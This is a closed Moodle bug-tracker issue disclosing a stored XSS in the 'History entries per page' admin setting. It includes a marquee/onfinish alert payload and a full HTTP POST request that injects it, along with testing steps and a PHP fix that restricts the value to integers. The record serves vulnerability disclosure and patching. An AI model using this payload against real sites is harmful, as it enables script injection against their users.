
Grade report history per page config setting should be restricted to int


    Details

    • Type: Bug
    • Status: Closed
    • Priority: Minor
    • Resolution: Fixed
    • Affects Version/s: 3.7.4, 3.8.1, 3.9
    • Fix Version/s: 3.7.6, 3.8.3
    • Component/s: Administration
    • Labels:
    • Testing Instructions:

      NOTE: This test starts BEFORE the patch is applied.

      Setup

      1. A Moodle site running moodle.git, aka, before patch (i.e. without this issue patched).

      Testing - strings are updated and no longer allowed

      1. Log into the site as admin.
      2. Navigate to Site administration and search for "History entries per page" (grade_report_historyperpage).
      3. Change the value to "Test" and press "Save changes".
      4. CONFIRM you are allowed to save that value.
      5. Switch to integration.git, aka, after patch (with the patch applied).
      6. Open a new tab and navigate back to Site administration to trigger a site upgrade.
      7. Once the upgrade is completed, go back to the "History entries per page" tab and refresh the page.
      8. CONFIRM the previous value of "Test" has now been replaced by "50".
      9. Attempt to reset the per page value to "Test" and CONFIRM you receive an error when trying to save the changes.
      10. Set the per page value to "30" and press "Save changes".
      11. CONFIRM the changes are successfully saved.

      Testing - integers are not modified during upgrade

      1. Again, start with a site before patch (i.e. without this patch).
      2. Log into the site as admin.
      3. Navigate to Site administration and search for "History entries per page" (grade_report_historyperpage).
      4. Change the value to "30" and press "Save changes".
      5. CONFIRM you are allowed to save that value.
      6. Switch to integration.git, aka, after patch (with the patch applied).
      7. Open a new tab and navigate back to Site administration to trigger a site upgrade.
      8. Navigate back to the "History entries per page" setting.
      9. CONFIRM the setting is still "30", and has not been updated to "50".
    • Affected Branches:
      MOODLE_37_STABLE, MOODLE_38_STABLE, MOODLE_39_STABLE
    • Fixed Branches:
      MOODLE_37_STABLE, MOODLE_38_STABLE
    • Pull 3.8 Branch:
    • Pull Master Branch:
      MDL-68061-master
    • Sprint:
      International 3.9 - Sprint 6

      Description

      The application is vulnerable to a Stored Cross-Site Scripting (XSS) attack. You can find reproduction steps and a sample HTTP request below.

      Tested Moodle version: 3.8.1+ (the latest)
      Tested browser version: Firefox 73.0.1
      Vulnerable parameter: 's__grade_report_historyperpage' on Grade History Module (/admin/settings.php?section=gradereporthistory)
      Tested payload: <marquee loop=1 width=0 onfinish=alert('Stored-XSS-Test')>

      Reproduce steps:
      1- Go to 'Grade History' module (/admin/settings.php?section=gradereporthistory)
      2- Change the HTTP POST request's 's__grade_report_historyperpage' parameter to the said payload (HTTP request is attached below).
      3- Go to any log page to observe the execution, e.g. the 'Live logs' page (report/loglive/index.php)

      Sample HTTP Request:

      POST /admin/settings.php?section=gradereporthistory HTTP/1.1
      Host: <REDACTED>
      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:73.0) Gecko/20100101 Firefox/73.0
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
      Accept-Language: en-GB,en;q=0.5
      Accept-Encoding: gzip, deflate
      Content-Type: application/x-www-form-urlencoded
      Content-Length: 182
      Origin: <REDACTED>
      DNT: 1
      Connection: close
      Referer: https://<REDACTED>/admin/settings.php?section=gradereporthistory
      Cookie: MoodleSession=4i<REDACTED>gr
      Upgrade-Insecure-Requests: 1
      section=gradereporthistory&action=save-settings&sesskey=Cr<REDACTED>id&return=&s__grade_report_historyperpage=%3Cmarquee+loop%3D1+width%3D0+onfinish%3Dalert%28%27Stored-XSS-Test%27%29%3E
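Added illustration (not Moodle's actual MDL-68061 patch): the setting definition before and after declaring an integer parameter type, plus an upgrade step of the kind the testing instructions describe, which resets an already-stored non-integer value to the default of 50 while leaving an integer such as "30" untouched. The file paths, upgrade function name and version number are assumptions.

```php
<?php
// Illustration only; file locations and version numbers are assumed.

// grade/report/history/settings.php, BEFORE: admin_setting_configtext defaults
// to PARAM_RAW, so any string, including markup, is stored and later echoed.
//
// $settings->add(new admin_setting_configtext('grade_report_historyperpage',
//     get_string('perpage', 'gradereport_history'),
//     get_string('perpage_help', 'gradereport_history'), 50));

// AFTER: declare the type explicitly. admin_setting_configtext validates the
// submitted value against PARAM_INT, so "Test" is rejected before it is saved.
$settings->add(new admin_setting_configtext('grade_report_historyperpage',
    get_string('perpage', 'gradereport_history'),
    get_string('perpage_help', 'gradereport_history'), 50, PARAM_INT));

// Upgrade step (assumed to live in grade/report/history/db/upgrade.php):
// values stored before the fix are normalised once. Only a value made of
// digits is kept; anything else falls back to the default of 50.
function xmldb_gradereport_history_upgrade($oldversion) {
    $newversion = 2020031700; // placeholder version number

    if ($oldversion < $newversion) {
        $perpage = get_config('core', 'grade_report_historyperpage');

        // "30" passes and is left as-is; "Test" or "<marquee ...>" does not.
        if ($perpage !== false && !ctype_digit((string) $perpage)) {
            set_config('grade_report_historyperpage', 50);
        }

        upgrade_plugin_savepoint(true, $newversion, 'gradereport', 'history');
    }

    return true;
}
```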

        Attachments

        1. MDL-68061.jpg (52 kB)
        2. MDL-68061 (2).jpg (29 kB)
        3. Stored XSS.png (159 kB)


            People

            Assignee: Michael Hawkins
            Reporter: Engin Aslan
            Peer reviewer: Simey Lameze
            Integrator: Eloy Lafuente (stronk7)
            Tester: Anna Carissa Sadia
            Component watchers: Andrew Nicols, Jun Pataleta, Michael Hawkins, Shamim Rezaie, Simey Lameze
            Votes: 0
            Watchers: 6

              Dates

              Fix Release Date: 11/May/20

                Time Tracking

                Estimated: Not Specified
                Remaining: 0m
                Logged: 6h 41m